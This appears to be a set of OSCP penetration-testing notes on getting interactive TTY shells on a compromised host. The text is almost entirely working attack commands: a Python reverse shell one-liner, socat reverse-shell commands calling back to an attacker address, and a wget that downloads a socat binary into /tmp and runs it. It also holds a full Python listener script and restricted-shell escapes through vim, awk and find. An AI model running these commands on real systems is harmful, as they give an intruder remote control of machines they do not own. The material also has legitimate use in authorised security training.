OSCP Notes
Interactive TTY Shells

Python pty module

Spawn a pty-backed shell from a dumb reverse shell (pick the interpreter present on the target):
python -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
A plain Python reverse shell (no pty; replace $ip with your listener address, then upgrade it with one of the pty.spawn one-liners above once it connects):
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ip",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Perl

perl -e 'exec "/bin/sh";'
Note that this only replaces the Perl process with a shell; unlike pty.spawn it does not allocate a pty.

Using socat

On Kali (listen; raw,echo=0 hands your local terminal over to the remote pty so Ctrl-C, tab completion and full-screen programs work):
socat file:`tty`,raw,echo=0 tcp-listen:4444
On Victim (launch; 10.0.3.4 is the Kali address):
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
If socat is not installed on the victim, fetch a static build and run it from /tmp:
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
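If Kali has no socat either, the listener half can be replaced with a few lines of Python. The script below is an added example, not part of the original notes: it accepts one connection on the same port 4444 used above, prints the TERM/stty fix-up commands sized to your terminal for pasting into the victim pty (after pty.spawn or the socat exec: one-liner on the victim side), then puts the local terminal into raw mode, which is what socat's raw,echo=0 does, and relays bytes both ways until the remote shell exits. The bind address 0.0.0.0, the xterm default for TERM and the function names are assumptions of this example.

```python
#!/usr/bin/env python3
"""Added example, not from the original notes: a pure-Python stand-in for the
Kali side `socat file:`tty`,raw,echo=0 tcp-listen:4444` for a box without socat.

Run it on the attacker machine, then have the victim connect with the socat
exec:... one-liner above or with any reverse shell followed by pty.spawn.
"""
import os
import select
import socket
import sys
import termios
import tty


def fixup_commands(rows, cols, term="xterm"):
    """Commands to paste into the victim pty once it is up.

    A reverse shell usually has no TERM and a default 24x80 pty; setting both
    to match the attacker terminal keeps vim/less/top from wrapping or hanging.
    """
    return "export TERM={}\nstty rows {} columns {}\nreset\n".format(term, rows, cols)


def relay(sock, tty_fd):
    """Copy bytes both ways between the victim socket and the local terminal
    until the victim closes the connection or local input hits EOF."""
    while True:
        readable, _, _ = select.select([sock, tty_fd], [], [])
        if sock in readable:
            data = sock.recv(4096)
            if not data:
                return  # victim shell exited
            os.write(tty_fd, data)
        if tty_fd in readable:
            data = os.read(tty_fd, 4096)
            if not data:
                return
            sock.sendall(data)


def serve(port=4444):
    """Accept one connection, put our terminal in raw mode (socat's raw,echo=0)
    so Ctrl-C, Ctrl-Z, tab and arrow keys go to the victim pty, and relay."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", port))  # assumption: listen on all interfaces
    srv.listen(1)
    print("[*] listening on %d" % port, file=sys.stderr)
    conn, peer = srv.accept()
    srv.close()

    fd = sys.stdin.fileno()
    if not os.isatty(fd):
        sys.exit("stdin is not a tty; run this from a real terminal")
    size = os.get_terminal_size(fd)
    print("[*] %s:%d connected. Paste into the victim shell after pty.spawn:\n%s"
          % (peer[0], peer[1], fixup_commands(size.lines, size.columns)),
          file=sys.stderr)

    saved = termios.tcgetattr(fd)
    try:
        tty.setraw(fd)  # no local echo, no local signal handling
        relay(conn, fd)
    finally:
        termios.tcsetattr(fd, termios.TCSADRAIN, saved)  # restore on exit
        conn.close()


if __name__ == "__main__":
    serve(int(sys.argv[1]) if len(sys.argv) > 1 else 4444)
```

Once the terminal is raw, Ctrl-C is delivered to the remote shell instead of killing the listener, so leave with `exit` on the victim side; the script restores the local terminal settings on the way out. Without this listener, the same result after pty.spawn is obtained by hand: background nc with Ctrl-Z, run `stty raw -echo; fg` locally, then paste the fix-up commands into the victim shell.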

Other ways

From any shell (interactive mode, still without a pty):
/bin/sh -i
From a Python prompt or a Python-based restricted shell:
import os; os.system('/bin/bash')
From a Perl prompt:
exec "/bin/sh";
Vi / Vim
:!bash
or
:set shell=/bin/bash
:shell
awk
awk 'BEGIN {system("/bin/bash")}'
find
find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
Note that find runs the awk command once per path it visits, so exiting the spawned bash just drops you into the next one; interrupt find itself when done.